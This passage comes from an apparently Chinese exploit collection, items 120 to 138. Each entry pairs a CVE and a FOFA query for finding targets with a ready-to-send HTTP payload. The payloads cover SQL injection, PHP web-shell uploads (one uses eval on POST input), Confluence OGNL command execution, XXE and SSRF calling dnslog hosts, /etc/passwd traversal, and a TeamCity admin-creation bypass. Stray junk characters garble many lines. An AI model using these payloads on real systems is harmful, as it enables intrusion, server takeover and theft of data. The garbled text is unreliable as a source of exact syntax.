6 s( T# Y+ V/ W# @: TAccept: */*. U/ M+ R1 X# F" k* \, j+ V' H6 s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 J; T1 }$ O+ r( S) ~* Z2 c1 pAccept-Encoding: gzip, deflate
3 X, [6 s* C* s; y1 k8 @Content-Type: application/x-www-form-urlencoded;9 G  ~# r* `9 }- H& X2 p8 Y3 _% [
Content-Length: 1097 }' [+ J2 b0 C) I2 ~
Origin: https://58.18.133.60:8443
0 c. x( |& r$ k* H( TReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
: ^+ E% `. |1 h, L# }Sec-Fetch-Dest: empty2 |- `6 F6 x# y  o2 G9 l
Sec-Fetch-Mode: cors
! D3 n6 q- k9 ~" B8 _Sec-Fetch-Site: same-origin
: f5 H- o" t' k3 M5 m) f) _" `1 SX-Forwarded-For: 1.1.1.1( U) t9 e( e* Z
X-Originating-Ip: 1.1.1.1  o/ [1 Z. g8 k( e. R: \2 E; {/ B: I
X-Remote-Ip: 1.1.1.1
/ [) T) L; D; e7 j8 J* A; hX-Remote-Addr: 1.1.1.1. X4 N2 {) I- ?6 t# ]& s9 ]9 v( n. p
Te: trailers
# i; g/ A8 Z/ x( Y% Z9 lConnection: close9 ^( Y# x' i( s( H

/ V$ W& ]% u$ K3 Z! u! w6 V" D: Csrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
# o+ k- a2 v: @7 x% c
7 e, h4 A8 r5 b+ o7 I) X
- N$ {) f: i6 g3 \8 S) ?5 `120. 北京百绰智能S40管理平台导入web.php任意文件上传
" f1 V! q" z# |9 W5 `CVE-2024-1253
2 }% D) z1 K* d& Y) {- p+ B- C0 b; ]FOFA:title="Smart管理平台"
$ J5 S, X. r+ H3 ^1 E9 P9 b$ aPOST /useratte/web.php? HTTP/1.1
" k$ u& h, u/ |+ WHost: ip:port
* X3 a: f: U# }+ B7 oCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
$ N: u8 D3 {2 A1 E  KUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
. z$ A& U! I) {& V1 L' o" MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" S4 M) N. c9 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 _, S, m  v1 v# S- y) R
Accept-Encoding: gzip, deflate/ o) ?' ~( v4 v: V/ `
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
2 Q7 d, T% Y8 W# jContent-Length: 597
5 Q2 \% [- t) B: D9 j$ AOrigin: https://ip:port
$ h4 @+ e* e" A  T9 v0 gReferer: https://ip:port/sysmanage/licence.php
  j1 j. A: @" A5 ~& m* ?% {7 ?0 [: UUpgrade-Insecure-Requests: 1' ]% j9 {5 j! O, |
Sec-Fetch-Dest: document" y, D3 b- _) z+ R/ b0 L+ V8 l  _
Sec-Fetch-Mode: navigate$ A( ?* d& {2 e& H/ ?
Sec-Fetch-Site: same-origin( N$ f. X: |+ J: B
Sec-Fetch-User: ?12 P" _; _- L* x) }  `( i
Te: trailers: k- [7 w& }2 a1 ~2 Y
Connection: close6 `" _8 H5 a' B* H$ G5 C

# {, ?  U# N7 T) N+ R& F& x3 v-----------------------------42328904123665875270630079328
, @/ B- N/ B1 H4 PContent-Disposition: form-data; name="file_upload"; filename="2.php"3 j7 r& J$ P; b! T- J
Content-Type: application/octet-stream; B) f2 E6 d$ ~) @
1 D. Z! i0 [% l! u& s
<?php phpinfo()?>
5 d" C+ @: W# ^- G-----------------------------42328904123665875270630079328
& n# z0 x  U5 B) w& `* kContent-Disposition: form-data; name="id_type"
& s6 H9 }! Q  b' Y2 B- a; n" ~2 T
1
1 B+ C( S; j8 |- ]" D- l-----------------------------42328904123665875270630079328
: A5 w7 G. r4 M# u, r+ QContent-Disposition: form-data; name="1_ck", Z1 P' u4 F! d; v, r

: H1 ]9 p, q1 \0 q; P* p9 Y1_radhttp
/ ^# A8 S4 D, [- j0 Q8 D-----------------------------42328904123665875270630079328
- c# I; J0 t+ ~$ n$ E8 e2 l6 ?Content-Disposition: form-data; name="mode"5 }& N8 `( @' S& ]1 N, v+ Y6 J1 ^% {
7 V: j0 \) v. B' q6 |
import$ }( o9 _# \/ d
-----------------------------42328904123665875270630079328* K( c0 j# ^! Q

; }* r1 m- T& j3 }- m( Q' q. a& P+ Z3 z( b" p2 v. r: C& s; S; P
文件路径/upload/2.php. z" c. j9 K# y" n7 A, Z

6 L4 r! j: ]& e! M  O# y121. 北京百绰智能S42管理平台userattestation.php任意文件上传
1 \* `5 E1 z4 L/ sCVE-2024-19183 Q: I6 T/ `% C- Y! S
FOFA:title="Smart管理平台"
. ~; N, `% O: }* r" m7 DPOST /useratte/userattestation.php HTTP/1.1
6 Z) P. W+ h: E/ I1 [2 Z" cHost: 192.168.40.130:8443
; D+ x, X  `, s5 d. wCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac504 |$ Z# @) i) b8 A" Y
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
8 H5 C4 G" r/ F, }. BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" h1 r0 B9 b4 ~3 e( L. R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' F" B# K( \, s' k/ P, ~7 S: G
Accept-Encoding: gzip, deflate
' Z0 L* r( p' g7 g5 U& EContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
9 h4 J4 K" O/ }9 HContent-Length: 5920 _# s  c6 {' {( f8 A# G
Origin: https://192.168.40.130:8443
) o/ v2 ^& \# E/ @/ A0 n: @5 wUpgrade-Insecure-Requests: 1
/ z. s0 H( G) C4 o& j- z: kSec-Fetch-Dest: document+ v. _. t& k1 u( T
Sec-Fetch-Mode: navigate
2 O' T, G$ K, |0 P( Z- rSec-Fetch-Site: same-origin
% T/ t( `% b* `/ {2 R- d! u" e3 ZSec-Fetch-User: ?1
2 v7 H! y2 {9 B  aTe: trailers! v5 S4 q0 F5 Q+ y8 D* y
Connection: close
) _* Q+ }5 X% ~% f4 ]1 x% B; Q/ `
7 U+ q+ o, U% C/ c' ?1 I-----------------------------423289041236658752706300793281 \$ U  a' {- W+ u3 o
Content-Disposition: form-data; name="web_img"; filename="1.php"+ a+ D$ \; `1 E$ h
Content-Type: application/octet-stream( i5 `; j- f  B! n7 K
2 {6 k+ b* o$ z4 Z/ a, T
<?php phpinfo();?>1 J7 R. F/ B3 j; f3 g5 B- |5 D% e
-----------------------------423289041236658752706300793287 I: C1 r/ C8 B' u  Y! @
Content-Disposition: form-data; name="id_type"
+ @0 z9 }# K7 y' I+ U
6 m  H6 L9 I* Z6 L0 T1
. @4 Q* D5 @7 x' P-----------------------------42328904123665875270630079328
5 _! H5 j) B# q4 V4 Q, K! LContent-Disposition: form-data; name="1_ck"3 b3 T+ m" t1 W" v) @* y/ L

8 E" K/ z. x% h. [9 O/ q1_radhttp
! L9 B% H+ `/ j7 x2 r8 Z-----------------------------423289041236658752706300793281 h5 l- K) v8 O, B9 x
Content-Disposition: form-data; name="hidwel"
' @  x& Z% e. X: b, o6 e
. H( n' f* h9 I8 h: j1 iset/ d7 N5 y! W: ~3 A4 k, T$ J
-----------------------------42328904123665875270630079328* F: c$ ]4 F7 d5 z0 }) }2 C
+ U" p, I4 w, t- C# U

: b. i  }& o" Y5 m+ q$ k4 Zboot/web/upload/weblogo/1.php
" s1 n9 b/ O) T( P2 Q
2 [+ E- Q7 h" Q5 i122. 北京百绰智能s200管理平台/importexport.php sql注入
/ c1 k  m& _! b  {; I6 gCVE-2024-27718FOFA:title="Smart管理平台"3 d4 d; v9 e$ U6 v, v+ M
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()8 p% h4 o; G2 I6 ]4 n' T
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1* C4 y- l0 \  E8 h# `" |
Host: x.x.x.x+ ]7 r: d! Y1 k4 N' C4 h' s
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
" j( r- t( z1 ^& P. Y# e; I, yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.05 o6 H" q# ]( G+ q+ F; `3 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* s: z  y+ L, I! D* \4 i+ Z  z( J9 ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  e: Z0 R  F& NAccept-Encoding: gzip, deflate, br
5 `/ V8 B* w! m* {, {) w2 `' eUpgrade-Insecure-Requests: 17 s8 _3 b( y+ H
Sec-Fetch-Dest: document( {7 Q2 N; p* W" [
Sec-Fetch-Mode: navigate8 A  m5 P: b  o0 ^* Q7 g
Sec-Fetch-Site: none$ N% v- ^  `" p5 W( O2 ^! j
Sec-Fetch-User: ?1  m( h# V8 M. g
Te: trailers
8 O+ H# f. f$ n, Q2 f: MConnection: close) V" o2 e% A2 e7 V8 s
, f1 O) m# C5 G
. I0 R; \8 d* j8 U
123. Atlassian Confluence 模板注入代码执行
4 e/ M% c# w2 e  x2 i# v" D3 N& cFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"* @" B& _+ P9 T' r0 Y
POST /template/aui/text-inline.vm HTTP/1.1
* @! B# b9 }9 e8 EHost: localhost:8090
9 G: E$ Y: U! {( WAccept-Encoding: gzip, deflate, br7 C" {& L: P) G
Accept: */*
7 }/ G: f0 ]' P: ^7 e" x/ PAccept-Language: en-US;q=0.9,en;q=0.8
- V( \% s! E! X* v" ~( s2 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
; Z8 l# @9 F! G* hConnection: close
# V5 i, @: \8 k) l0 z2 m7 eContent-Type: application/x-www-form-urlencoded" v3 ^% p6 L- n0 ^# o
& ?2 o7 V( v6 q
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))0 t. W/ p$ w! f9 U7 \& z9 a. Y, u
7 f( n  n' s7 T4 \  G2 m- j% E! p
6 m; f3 H3 n  t, c
124. 湖南建研工程质量检测系统任意文件上传
: C/ t! U1 f  p+ ZFOFA:body="/Content/Theme/Standard/webSite/login.css"6 T7 D0 I, O; o5 V5 N% {
POST /Scripts/admintool?type=updatefile HTTP/1.14 l3 g5 ~: S4 g/ E
Host: 192.168.40.130:8282* C% i* p2 e1 B5 b& m1 X+ h
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
3 [- b* k( Z& T7 KContent-Length: 72; n+ R( {9 i  u3 B% @+ z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
# v0 @5 p! L, H3 y4 t. E$ h1 i  {Accept-Encoding: gzip, deflate, br
( n* q4 X- y$ P9 D! a: PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! N4 G. w* C+ {0 m4 n1 e' H% S
Connection: close
% z, a6 J" Y1 X2 BContent-Type: application/x-www-form-urlencoded
$ h8 t4 v5 N7 u, H" u3 S8 T- n7 i+ Q1 B# Q, N  v
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
6 Q# i% l0 Z  `( a% l0 O( q" L" m$ A$ C

" u6 K! U$ [$ p1 Q/ v7 R* Z2 xhttp://192.168.40.130:8282/Scripts/abcgcg.aspx
: t9 F2 e' P' E/ J. |
. a# W9 e$ l! z3 Y5 U! e9 `125. ConnectWise ScreenConnect身份验证绕过
2 ^$ f9 T  k( k4 @" W( H  OCVE-2024-1709
3 Z, ~4 @. }' Y5 g% y1 tFOFA:icon_hash="-82958153"- E4 v6 h/ H/ x" |. B& e/ `
https://github.com/watchtowrlabs ... bypass-add-user-poc, Z. m4 J- s) F( S, `

/ w& ^1 n) ~: M* }+ ?- M0 J& L+ m. z4 i
使用方法
3 q3 W' P. R  ]8 K. n* |4 Gpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
( j9 h2 B1 S  W; O4 I3 \3 v& \+ R( |$ F# ^/ V+ I( U

3 [! t# a& ~8 a* T8 \创建好用户后直接登录后台,可以执行系统命令。- O3 g1 v8 G1 V, Q/ V
0 A- _+ R4 e) G! j; r
126. Aiohttp 路径遍历
0 G1 A9 M5 d+ P! J  b' z* sFOFA:title=="ComfyUI"
' [& C* N- `" w  A; ^/ fGET /static/../../../../../etc/passwd HTTP/1.1
- K- \. W5 F# u$ k$ LHost: x.x.x.x9 i+ U3 l" Q$ n9 U2 d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
9 @$ ^9 N9 ?: U# CConnection: close" }4 o2 R  W2 {. T0 f
Accept: */** Z% H. d6 C/ F: {  A
Accept-Language: en
# O- P4 O+ z: J6 `! u( |Accept-Encoding: gzip5 q: @- M! f" F$ A5 e

  r: b: `/ F$ n2 x" q: M3 o7 v# d
127. 广联达Linkworks DataExchange.ashx XXE" ^. {! S4 x: N& ~" x/ Y* T8 X; d
FOFA:body="Services/Identification/login.ashx" + X3 I! t7 ~- z  X
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1( c  Q: F8 |! \
Host: 192.168.40.130:8888: X' Z6 u4 C5 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
. ^  r. p8 ?. W. @Content-Length: 415
# ~5 Y3 {: ~/ G% B# r# qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# p/ J/ T5 }* `$ J7 j- v
Accept-Encoding: gzip, deflate
, V- @& @8 P$ W: V: p6 k7 CAccept-Language: zh-CN,zh;q=0.9! [; M: Q4 f9 [# f3 E
Connection: close
; Q, ~) K+ [7 e0 e7 EContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
- {8 ]$ j& [. i/ f/ \Purpose: prefetch$ t. g0 N+ M* z$ w: x
Sec-Purpose: prefetch;prerender
4 T- a5 m; t# n. \/ L4 t
2 v0 r# c$ ]/ }8 y! w------WebKitFormBoundaryJGgV5l5ta05yAIe08 a1 N6 M( {3 p1 z0 |
Content-Disposition: form-data;name="SystemName"
9 P5 e. j9 U! v7 D* J0 l
/ j/ B/ p5 B' n5 ~# u/ J+ ZBIM
6 ^& f4 \5 t% @5 Q* m' @------WebKitFormBoundaryJGgV5l5ta05yAIe0
, c( _7 r& Y  ?8 [8 m7 u* k1 cContent-Disposition: form-data;name="Params"
4 I  j  Q" B4 r5 q, hContent-Type: text/plain
/ o9 p; q+ V2 e9 ]0 q' i: Q2 W+ R  \& w6 l+ p) R( f: N" [
<?xml version="1.0" encoding="UTF-8"?>
% \+ `' F0 O! [  o<!DOCTYPE test [
& w5 t7 W: s, d4 v<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
- G+ ?2 {+ a, s/ ^]
6 \# K0 d7 n" n  X+ b>
3 H+ E  ~8 G: e+ S<test>&t;</test>
3 U% k* K6 q+ Z7 x: a; p& u------WebKitFormBoundaryJGgV5l5ta05yAIe0--
7 H. o7 w: \3 v- D) Z8 P
* D- t* ?- o1 `% K& N- ~% K1 V# ^! N& F2 A8 a: P' L" a" N
( \# h) D3 A3 F' f# g0 R4 P6 M
128. Adobe ColdFusion 反序列化+ s9 Y2 S/ M) I$ J% r* H: q
CVE-2023-38203
% Q# K! L4 t8 H0 z8 jAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
( d8 b9 h. Z: \6 n! h9 N% y  \FOFA:app="Adobe-ColdFusion"
3 W3 m5 {8 W% l2 SPAYLOAD7 V/ U$ v& k7 f; z% J
  X5 X: O( T. g' _" N
129. Adobe ColdFusion 任意文件读取
! H5 o& s" _' o% i; s: v8 MCVE-2024-20767
' K  y: Q7 t, f, [0 k% BFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"3 J; l8 U; \5 ]; J# Z9 M
第一步,获取uuid" N' s2 ?1 h$ O) c. J' u, W
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
# p/ d& G2 W- T. s: }Host: x.x.x.x8 V4 D& c: B) j8 r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 n2 b! [8 H. bAccept: */** R7 K& Q$ A' P& ?
Accept-Encoding: gzip, deflate
+ f: K6 U/ l/ ~- l$ C" c: l1 f! kConnection: close
2 S' ]& D% S+ g) @9 i
& l8 J6 p2 o' Q  H0 o# `: n' |4 V+ `5 o" ?# x9 v: D
第二步,读取/etc/passwd文件9 P9 {% n% n( C4 @$ C3 g' I" M
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1! E" ~$ i4 o) o1 \, |& Q* C
Host: x.x.x.x# ~5 m" z1 i7 w# q; ]- c' Q; n& K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
* G6 X5 L1 p6 tAccept: */*
  Y" o$ t' L& p# d8 J; m( EAccept-Encoding: gzip, deflate# H5 G( ~$ z$ Q2 c' j6 \
Connection: close4 v- q7 s6 `5 D+ x2 |* t; ^  _" i* y: D
uuid: 85f60018-a654-4410-a783-f81cbd5000b94 }# H: l9 R3 f. ^) g' A

% T4 u. {4 I+ ~& n  B
5 X( y7 u1 j( N0 f130. Laykefu客服系统任意文件上传, N% s, x* d/ h2 J7 g6 A
FOFA:icon_hash="-334624619"
8 W! n# V+ ~9 B) M$ _" o# `% BPOST /admin/users/upavatar.html HTTP/1.1
" m3 U" v& l0 `: Z$ ?* j1 fHost: 127.0.0.1
9 P7 E# E1 X0 E' Q7 ZAccept: application/json, text/javascript, */*; q=0.01% v6 v1 w8 E7 s& Z" {/ g: J
X-Requested-With: XMLHttpRequest
$ K2 \! o  g* k# ?- q" |User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.261 c5 n' R0 f& |$ Q& B% B8 \  |
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
" g+ t8 z/ g" zAccept-Encoding: gzip, deflate
) }# z' r/ J4 t" hAccept-Language: zh-CN,zh;q=0.9  Q0 Q, B  F( F! @* V0 q
Cookie: user_name=1; user_id=35 s4 |3 p! z4 O+ C) w
Connection: close
8 S( y/ I5 m2 A; O4 O, R+ ~3 H7 m) w( M7 U/ L, k. D" a) O
------WebKitFormBoundary3OCVBiwBVsNuB2kR3 D: [  g  \1 V
Content-Disposition: form-data; name="file"; filename="1.php", T# o+ E; ~5 L+ p% N
Content-Type: image/png; S( q" _, D0 R2 s& o9 @5 @5 J
; O3 m1 O; O* G7 _" G
<?php phpinfo();@eval($_POST['sec']);?>; a, Y3 }1 S8 b) u" e
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
8 r$ Z2 e/ m+ s+ D, x( }1 W' S* J! J  M2 r8 t" C! X

; x; @3 _- p9 \) h5 `, k9 X0 b& o131. Mini-Tmall <=20231017 SQL注入
5 [9 x/ `" ?" gFOFA:icon_hash="-2087517259"
0 \$ n2 x- F% t5 _9 U$ S后台地址:http://localhost:8080/tmall/admin
- f- O9 ?: k- f& R, Phttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
6 v7 d) s/ c; T7 O) g# B, i) b8 b. w
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过$ Q4 s5 z( _6 l5 \3 b
CVE-2024-27198
# L: k5 b4 `. u) }FOFA:body="Log in to TeamCity"1 R; V- j0 e% E! [+ }6 q! O1 y
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.16 s& v. ~6 h7 {+ W) N6 [1 R
Host: 192.168.40.130:8111
* l6 b9 D8 l! r3 v. r6 S0 N1 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, l0 @- h0 }; U4 E: [, H* p
Accept: */*4 E+ V1 |2 p, F/ E: A
Content-Type: application/json
: H- e1 {( A) y0 x' X5 h$ WAccept-Encoding: gzip, deflate
5 c3 J$ T! ~% M* d% c# H/ c. h9 R6 Q2 j# Q7 v
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}9 h( B' b+ E! |" L5 v2 o, _

; \% s1 ^( y  r. U& l! l6 {7 u- T7 n7 l
CVE-2024-27199( Z& |! w: ]3 Q6 f
/res/../admin/diagnostic.jsp- m8 M6 u4 f1 e
/.well-known/acme-challenge/../../admin/diagnostic.jsp( H) E6 f7 d- ^; Q! u
/update/../admin/diagnostic.jsp% {; q* U  g; I1 r4 t. ]

* J# K) ^4 e1 G, l1 Z
  i8 e- c4 d# F  t) ECVE-2024-27198-RCE.py
' l0 `; x6 w$ k7 J! y
5 x. D: K. d2 v5 P) d- @" ~5 @133. H5 云商城 file.php 文件上传) F, a7 o* S) a$ u1 ~! c
FOFA:body="/public/qbsp.php". t$ [3 i" a  i, ], q- f" i/ X
POST /admin/commodtiy/file.php?upload=1 HTTP/1.12 b2 ?5 U* g* u0 c. P, _  Y
Host: your-ip
4 W9 s9 O1 F5 \& EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.368 _7 n2 p+ @) D6 D- |) ^
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
& h8 P) g/ j( Q: T2 f
, Y) t  a  \+ x% F6 L, G  |------WebKitFormBoundaryFQqYtrIWb8iBxUCx* c$ y; e% u5 R; v( R; f
Content-Disposition: form-data; name="file"; filename="rce.php"% Z1 v- |" D$ ^' v  J: f
Content-Type: application/octet-stream7 r. Y+ I: s( c1 X

0 \3 O/ O/ R. ~# v1 F, E- i<?php system("cat /etc/passwd");unlink(__FILE__);?>7 n6 U" Q; U7 N: s% e
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
  R  v6 o: [: Z9 a% I
8 x5 o0 s3 _9 T7 r: c7 a3 R+ D8 k+ b. A8 T) H/ F, T2 R$ E

: w9 k* I8 m- O/ t1 w, ?5 Y$ s* m134. 网康NS-ASG应用安全网关index.php sql注入) Z7 b! Q# K8 Y# H
CVE-2024-2330
9 X# A: N) O, x" D/ ]  v( K, iNetentsec NS-ASG Application Security Gateway 6.3版本
8 w6 W# Y+ h: j7 D) HFOFA:app="网康科技-NS-ASG安全网关"7 Y/ }* E( p  t8 A5 q
POST /protocol/index.php HTTP/1.1
7 C* ]/ B3 A: f% ?/ t* I1 DHost: x.x.x.x
: j: z  f" P7 k/ ?6 n. K- XCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
/ R5 r' u/ m- w' U- T. u3 z. G5 dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0+ Q: [- A: n+ B8 p& \; G  {* k) L
Accept: */*9 F8 G5 z: t5 `" Q8 z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 Y$ [1 `! `) m; K9 m) u
Accept-Encoding: gzip, deflate
, C) E1 @0 O- ?/ r) B& C: ?  iSec-Fetch-Dest: empty) r  ]1 v7 H6 h7 p6 A, o
Sec-Fetch-Mode: cors* @9 A7 m- r$ N6 Y
Sec-Fetch-Site: same-origin% \+ R( v0 q% G
Te: trailers
1 g' H, l& `# h, R! {" RConnection: close
7 V2 e- z0 L4 D; C0 S5 h) c2 nContent-Type: application/x-www-form-urlencoded
# i& c# q. U% |' O5 k2 I4 kContent-Length: 263: C# o( @: c; e! L' @
. b0 |" G& h, r$ I6 e5 {( u1 C1 Z
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
3 u$ ^3 w- T5 U2 D
" v0 F7 E0 f, V3 y% n
) V0 v0 L' R1 S0 e2 D9 b1 ]135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入) m; C; @- d3 Z
CVE-2024-2022
& U4 I& x( j1 G# }$ a' aNetentsec NS-ASG Application Security Gateway 6.3版本9 e1 }' C9 I9 }$ K- H
FOFA:app="网康科技-NS-ASG安全网关"! J% n  R3 c  M& I: A
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
3 n; N; ]1 g1 }! ~( w- S1 PHost: x.x.x.x
* j! N( p7 J! B3 G0 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
% D* _  k  l0 I* @( A7 v8 mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' o3 V+ G1 `- A" Q# _- \7 _' hAccept-Encoding: gzip, deflate
1 v; g  q. }! p7 f# g, \Accept-Language: zh-CN,zh;q=0.9
* b1 f7 ^  V2 J) l" E$ xConnection: close
5 V. s0 v3 l& y( O) w/ Y  e6 ?# R. L

6 T; `$ X9 [" u# p/ F$ I136. NextChat cors SSRF
" D" n& C3 o5 gCVE-2023-49785
2 N% T+ `4 d+ l4 ]" eFOFA:title="NextChat"
- V3 a! O) k6 y: N& a6 B' O" ?) v) {GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
) l8 Z, ?: Z8 V8 w$ \; W! jHost: x.x.x.x:10000
3 s$ Y0 ?9 \6 N% qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
3 ?) G7 T/ S3 `! S6 ?7 c" yConnection: close
, A3 a$ V; a( V' d( @5 o0 eAccept: */*
& b% P1 o3 p. `& }Accept-Language: en$ M  O: ^1 B. y% f4 g" f
Accept-Encoding: gzip
1 g& r' v0 D* W0 m0 f: N# C1 e  {3 J5 g  s; y5 x
. Z/ U* p) q: K. F
137. 福建科立迅通信指挥调度平台down_file.php sql注入' v# w* ~7 ?/ V' q* ^2 }
CVE-2024-26203 [  {; M& D# S% y
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
0 D7 v7 l8 _1 Q" L/ S9 C7 yGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.15 E* v3 K+ k% O, B) x: o, a
Host: x.x.x.x6 ^/ f" C- _8 K' K: N/ O% f: U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 _0 d- h& L( L0 ~; CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) d! s1 }! V1 |% @# {# G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# p1 r6 Y( A4 Z  L0 {! rAccept-Encoding: gzip, deflate, br! ]1 E, k  s- y- X4 X3 p
Connection: close
9 W* ]7 ~( L8 d/ \  ]5 vCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
9 ^4 N  L( k# {2 }Upgrade-Insecure-Requests: 1. ?( E) d: W8 s) A
7 ?7 H% B3 l: ]+ s$ m+ q& P

  _5 O* x4 w! j  F6 H* \8 L- a138. 福建科立讯通信指挥调度平台pwd_update.php sql注入, O8 {7 v$ N: ]9 p5 A) H
CVE-2024-2621. p' d! H& M  H0 d1 t
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"8 Y5 `0 f% C/ t
